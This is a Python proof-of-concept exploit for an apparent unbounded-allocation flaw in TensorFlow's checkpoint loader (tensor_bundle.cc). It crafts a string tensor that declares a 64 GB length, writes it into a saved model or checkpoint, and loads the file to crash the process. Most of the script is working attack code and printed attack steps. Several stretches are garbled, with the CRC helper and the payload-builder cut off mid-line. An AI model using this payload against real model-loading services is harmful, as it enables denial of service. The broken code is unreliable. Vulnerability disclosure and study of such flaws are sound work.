#!/usr/bin/env python3 """ PoC: TensorFlow Checkpoint String Tensor Unbounded Allocation DoS ================================================================= CVE: TBD Target: tensorflow/core/util/tensor_bundle/tensor_bundle.cc Trigger: tf.saved_model.load() or tf.train.load_checkpoint() Vulnerability: ReadStringTensor() reads varint64 string_lengths from attacker-controlled checkpoint data files. No validation that individual string_length values or their sum are bounded by entry.size(). Attacker can craft a checkpoint where a string tensor with shape [1] declares a single string of 64GB, causing immediate OOM crash via tstring::resize(). CRC32 checksums are NOT a security boundary — the attacker controls both the data file content AND the crc32c field in BundleEntryProto metadata. Root Cause: tensor_bundle.cc:151-159 — ReadStringTensor() inner loop: buffer->resize(string_length); // string_length from attacker varint64 ReadNBytes(string_length, ...); // reads from file No check: sum(string_lengths[i]) <= entry.size() - overhead No check: individual string_length <= entry.size() Impact: - Process crash (OOM / std::terminate) on loading malicious SavedModel - Denial of service for any application using tf.saved_model.load() - No authentication required — victim just needs to load a model file Additionally affected: ReadVariantTensor() at line 188 (same pattern). GetValue() has NO size validation at all for DT_VARIANT tensors (line 998). """ import os import sys import struct import tempfile import shutil def encode_varint64(value): """Encode an integer as a protobuf varint64.""" result = bytearray() while value > 0x7F: result.append((value & 0x7F) | 0x80) value >>= 7 result.append(value & 0x7F) return bytes(result) def encode_fixed32(value): """Encode as little-endian uint32.""" return struct.pack('> 15) | (crc << 17)) + kMaskDelta) & 0xFFFFFFFF def create_malicious_checkpoint_data(): """ Create the raw data bytes for a DT_STRING tensor with shape [1]. The data file format for string tensors: [varint64 string_length_0] ... [varint64 string_length_N-1] [uint32 length_checksum] [string_data_0] ... [string_data_N-1] We encode string_length_0 = 0x1000000000 (64GB) — causes OOM on resize(). """ # 64 GB string length — way more than any system can allocate malicious_length = 0x1000000000 # 64 GB # Encode the string length as varint64 length_bytes = encode_varint64(malicious_length) # Compute CRC32C of the length (as uint64 in memory, not varint bytes) # TF checksums the in-memory uint64 representation, not the varint encoding length_as_uint64 = struct.pack('resize(string_length); // <-- UNBOUNDED ALLOCATION size_t bytes_read = 0; TF_RETURN_IF_ERROR( buffered_file->ReadNBytes(string_length, &(*buffer)[0], &bytes_read)); } """) print("ATTACK SCENARIO:") print("-" * 50) print(""" 1. Attacker crafts a SavedModel with a DT_STRING variable 2. In the checkpoint data file, the varint64 string_length = 64GB 3. CRC32C checksum in BundleEntryProto.crc32c is set correctly (attacker controls both data and metadata — CRC is not a security check) 4. Victim loads model: tf.saved_model.load('malicious_model/') 5. BundleReader::Lookup() → GetValue() → ReadStringTensor() 6. tstring::resize(64GB) → std::bad_alloc → std::terminate() → CRASH """) print("ALSO AFFECTED: ReadVariantTensor (tensor_bundle.cc:188)") print("-" * 50) print(""" string buffer; buffer.resize(string_length); // <-- SAME UNBOUNDED ALLOCATION GetValue() has NO size validation for DT_VARIANT (line 998-1009). For DT_STRING, the "lower_bound" check is too weak: lower_bound = NumElements (e.g., 1 for shape [1]) entry.size() just needs to be >= 1 — trivially satisfied. """) print("MALICIOUS DATA FILE CONSTRUCTION:") print("-" * 50) data, crc = create_malicious_checkpoint_data() print(f" Data file size: {len(data)} bytes") print(f" Encoded varint64 string_length: 0x1000000000 (64 GB)") print(f" Overall CRC32C: 0x{crc:08X}") print(f" Data hex dump: {data[:32].hex()}") print() # Show the varint encoding malicious_length = 0x1000000000 varint = encode_varint64(malicious_length) print(f" Varint64 encoding of 64GB: {varint.hex()} ({len(varint)} bytes)") print() def poc_with_tensorflow(): """ Full PoC that creates and loads a malicious checkpoint. Requires TensorFlow installed. """ try: import tensorflow as tf import numpy as np except ImportError: print("[!] TensorFlow not installed. Running analysis-only mode.") demo_vulnerability_analysis() return False print("[*] TensorFlow version:", tf.__version__) print("[*] Creating legitimate SavedModel with string variable...") tmpdir = tempfile.mkdtemp(prefix="tf_poc_") model_dir = os.path.join(tmpdir, "saved_model") try: # Step 1: Create a legitimate SavedModel with a string variable class SimpleModule(tf.Module): def __init__(self): self.v = tf.Variable(["hello"], dtype=tf.string, name="str_var") @tf.function(input_signature=[]) def get_value(self): return self.v module = SimpleModule() tf.saved_model.save(module, model_dir) print(f"[+] Saved legitimate model to: {model_dir}") # Step 2: Find and patch the data file var_dir = os.path.join(model_dir, "variables") data_files = [f for f in os.listdir(var_dir) if f.startswith("variables.data")] if not data_files: print("[-] No data files found!") return False data_path = os.path.join(var_dir, data_files[0]) print(f"[*] Data file: {data_path}") with open(data_path, 'rb') as f: original_data = f.read() print(f"[*] Original data file size: {len(original_data)} bytes") # Step 3: Create malicious data file # For a shape [1] string tensor, the data format is: # [varint64 string_length_0][uint32 length_crc][string_bytes] malicious_data, _ = create_malicious_checkpoint_data() with open(data_path, 'wb') as f: f.write(malicious_data) print(f"[*] Wrote malicious data file ({len(malicious_data)} bytes)") print(f"[*] Malicious string_length = 64 GB (0x1000000000)") # Note: We also need to update the .index file's BundleEntryProto # to match the new data size and CRC. For a full exploit, the index # file would also be crafted. This simplified PoC demonstrates the # concept — the CRC mismatch will be caught but the allocation # happens BEFORE the CRC check. # Step 4: Attempt to load — should crash or OOM print() print("[!] Attempting to load malicious model...") print("[!] Expected: OOM crash or std::terminate") print() try: loaded = tf.saved_model.load(model_dir) print("[-] Load succeeded unexpectedly") except Exception as e: print(f"[+] Exception caught: {type(e).__name__}: {e}") # Note: if the process crashes with SIGKILL (OOM killer) or # std::terminate, this exception handler won't be reached. # That's the DoS — the process dies. return True finally: shutil.rmtree(tmpdir, ignore_errors=True) def poc_direct_checkpoint(): """ Alternative PoC using direct checkpoint loading (simpler trigger). """ try: import tensorflow as tf import numpy as np except ImportError: print("[!] TensorFlow not installed. Running analysis-only mode.") demo_vulnerability_analysis() return False print("[*] TensorFlow version:", tf.__version__) print("[*] Creating checkpoint with string variable...") tmpdir = tempfile.mkdtemp(prefix="tf_ckpt_poc_") ckpt_prefix = os.path.join(tmpdir, "malicious_ckpt") try: # Create legitimate checkpoint v = tf.Variable(["test_string"], dtype=tf.string, name="vuln_var") ckpt = tf.train.Checkpoint(var=v) save_path = ckpt.save(ckpt_prefix) print(f"[+] Saved checkpoint: {save_path}") # Find data file data_files = [f for f in os.listdir(tmpdir) if '.data-' in f] if not data_files: print("[-] No data files found!") return False data_path = os.path.join(tmpdir, data_files[0]) # Patch with malicious string length malicious_data, _ = create_malicious_checkpoint_data() with open(data_path, 'wb') as f: f.write(malicious_data) print(f"[*] Patched data file with 64GB string_length") print(f"[!] Loading malicious checkpoint...") try: v2 = tf.Variable([""], dtype=tf.string, name="vuln_var") ckpt2 = tf.train.Checkpoint(var=v2) ckpt2.restore(save_path) print(f"[-] Restore succeeded unexpectedly. Value: {v2.numpy()}") except Exception as e: print(f"[+] Exception: {type(e).__name__}: {e}") return True finally: shutil.rmtree(tmpdir, ignore_errors=True) if __name__ == "__main__": print("TensorFlow Checkpoint String Tensor DoS PoC") print("=" * 50) print() if "--analysis" in sys.argv: demo_vulnerability_analysis() elif "--checkpoint" in sys.argv: poc_direct_checkpoint() else: # Default: try TF PoC, fall back to analysis if not poc_with_tensorflow(): demo_vulnerability_analysis()